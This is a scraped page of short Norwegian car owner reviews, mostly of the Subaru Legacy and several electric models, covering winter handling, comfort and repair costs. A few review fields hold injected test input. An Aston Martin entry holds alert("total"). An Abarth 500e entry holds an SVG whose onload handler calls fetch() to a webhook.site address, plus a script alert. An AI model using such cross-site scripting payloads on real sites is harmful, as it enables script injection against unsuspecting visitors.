Vurdert av misty
Subaru Legacy (2014)
Anbefales dersom fremkommelighet vinterstid vektlegges. Jeg har hatt denne bare 3000 km (kjøpt brukt) men bilen oppleves som særdeles god, gode seter, stille og fine kjøreegenskaper.
Subaru Legacy (2011)
God kvalitet og fantastisk på vinterføre
Subaru Legacy (2011)
Meget bra bil med gode kjøreegenskaper og driftssikkerhet.
Subaru Legacy (2010)
Solid, trygg og komfortabel bil med manuell gir. Fantastisk på vinterføre! Vurderte outback, men veldig fornøyd med legacy. Bytte av alle glødepluggene på 82000km ble dyrt, og likeledes bytte av
Subaru Legacy (2010)
Bilen kjøpte jeg som demo-kjørt med 2500km på telleren ,den er i dag kjørt 222.000 km uten store verkstedutgifter , kun skiftet et bakhjulslager og 2 små gummiforinger i bakstillingen . Både jeg
Subaru Legacy (2010)
Meget god på vinterføre og på dårlige veier. God plass mye utstyr. Solid og stødig bil, billig å eie.
Subaru Legacy (2010)
Dette var den dyreste diesel utgaven den gangen. Heter Sport Premium og kom orginalt med 18", spesiel front, gule bilstein etc. Veldig godt utstyrt. AWD
Subaru Legacy (2010)
Alt i alt godt fornøyd med bilen, og ville uten problemer anbefalt den.
Subaru Legacy (2009)
Problemfritt , pålitelig og meget rimelig bilhold, hva gjelder drift, vedlikehold og drivstoffforbruk. En veldig komfortabel og romslig bil med godt med krefter og fantastisk fremkommelighet. Alltid
Subaru Legacy (2009)
Kul och god bil att köra men att subaru fick till att laga en sån skitmotor hade jag aldrig trott. Förstörd turbo med motorhavei på köpet var inte kul. Dålig service subaru trondheim.
Subaru Legacy (2009)
En svært trivelig og solid, driftssikker og lettkjørt bil . Sterk motor med rimelig forbruk. (Bilen er for øvrig en SEDANutgave - noe som ikke var et mulig alternativ da jeg skulle velge modell ov
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km
BMW 3-Serie (2012)
Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat